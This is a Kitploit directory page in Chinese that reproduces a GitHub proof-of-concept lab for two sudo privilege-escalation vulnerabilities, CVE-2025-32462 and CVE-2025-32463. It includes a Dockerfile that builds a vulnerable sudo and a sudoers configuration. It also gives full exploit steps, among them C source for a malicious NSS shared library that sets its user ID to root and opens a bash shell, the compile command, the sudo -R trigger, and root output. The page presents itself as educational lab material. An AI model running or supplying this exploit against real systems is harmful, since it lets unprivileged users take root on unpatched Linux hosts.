Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32462_32463-Lab — 针对 CVE-2025-32462 与 CVE-2025-32463 (sudo) 的 Docker PoC,基于 Stratascale CRU 的研究。 | Kitploit
工具/GitHubGitHub/maaythm/cve-2025-32462_32463-lab
权限提升漏洞分析漏洞利用渗透测试学习与教育实验室与实践
GitHubmaaythm/cve-2025-32462_32463-lab

CVE-2025-32462_32463-Lab

针对 CVE-2025-32462 与 CVE-2025-32463 (sudo) 的 Docker PoC,基于 Stratascale CRU 的研究。

查看仓库
511年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-32462 & CVE-2025-32463 – PoC 实验室

这是一个基于容器的实验室和 PoC,针对 sudo 中的以下漏洞:

  • CVE-2025-32462 – sudo -h 主机匹配逻辑绕过
  • CVE-2025-32463 – sudo -R chroot NSS 库逃逸

🔒 仅供教育用途。请勿在您不拥有或无权限测试的系统上使用。


🔬 原始研究

  • CVE-2025-32462 相关博文:sudo 主机别名权限提升
  • CVE-2025-32463 相关博文:sudo chroot NSS 绕过

🧠 研究致谢

  • Rich Mirch
    Stratascale Cyber Research Unit (CRU)
    @Stratascale

🧪 实验室设置(Docker)

🔧 Dockerfile

root@kitploit:~
FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \\
    apt-get install -y build-essential wget libpam0g-dev libselinux1-dev zlib1g-dev \\
                       pkg-config libssl-dev git nano gcc && \\
    rm -rf /var/lib/apt/lists/*

WORKDIR /opt
RUN wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \\
    tar xzf sudo-1.9.16p2.tar.gz && \\
    cd sudo-1.9.16p2 && \\
    ./configure --disable-gcrypt --prefix=/usr && make && make install

RUN useradd -m -s /bin/bash pwn && echo 'pwn:pwn' | chpasswd

USER pwn
WORKDIR /home/pwn

CMD ["/bin/bash"]

🚀 构建与运行

root@kitploit:~
docker build -t sudo-vuln-lab .
docker network create --subnet=172.190.0.0/16 sudolabnet
docker run -d --network sudolabnet --ip 172.190.0.3 --hostname 'lowpriv.test.local' --add-host highpriv.test.local:172.190.0.2 --name lowpriv sudo-vuln-lab tail -f /dev/null

CVE-2025-32462 的额外设置

root@kitploit:~
docker exec -u root -it lowpriv bash

# inside root shell of docker container
root@lowpriv:/home/pwn# echo 'Host_Alias HIGH = highpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'Host_Alias LOW = lowpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'pwn HIGH,!LOW = NOPASSWD:ALL' >> /etc/sudoers

手动利用

CVE-2025-32462

正常操作

root@kitploit:~
pwn@lowpriv:~$ sudo id
Password: ^C
sudo: a password is required

漏洞利用

root@kitploit:~
pwn@lowpriv:~$ sudo -h highpriv.test.local id
uid=0(root) gid=0(root) groups=0(root)

pwn@lowpriv:~$ sudo -h highpriv.test.local hostname -f
lowpriv.test.local

CVE-2025-32463

正常操作

root@kitploit:~
pwn@lowpriv:~$ sudo id
Password: 
pwn is not allowed to run sudo on lowpriv.

准备

root@kitploit:~
# Step 1: Create the chroot directory structure
mkdir -p exploitDir/etc

# Step 2: Write a malicious nsswitch.conf to load our exploit module
echo 'passwd: /cve_2025_32463' > exploitDir/etc/nsswitch.conf

# Step 3: Create directory for the malicious NSS library
mkdir libnss_

# Step 4: Copy necessary group file into chroot environment
cp /etc/group exploitDir/etc/

# Step 5: Write the malicious NSS shared library source code
cat > cve_2025_32463.c <<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void GIVEMEROOT(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

# Step 6: Compile the malicious NSS shared library
gcc -shared -fPIC -Wl,-init,GIVEMEROOT -o libnss_/cve_2025_32463.so.2 cve_2025_32463.c

# Step 7: Launch sudo with chroot to trigger the vulnerability
sudo -R exploitDir HEHE RUN THIS AND GIVE ME ROOT

root@lowpriv:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)

免责声明

此 PoC 仅供教育和授权研究使用。


✍️ 作者

PoC 实验室和 Docker 环境由 MAAYTHM 创建。

研究致谢:Rich Mirch – Stratascale CRU

下载工具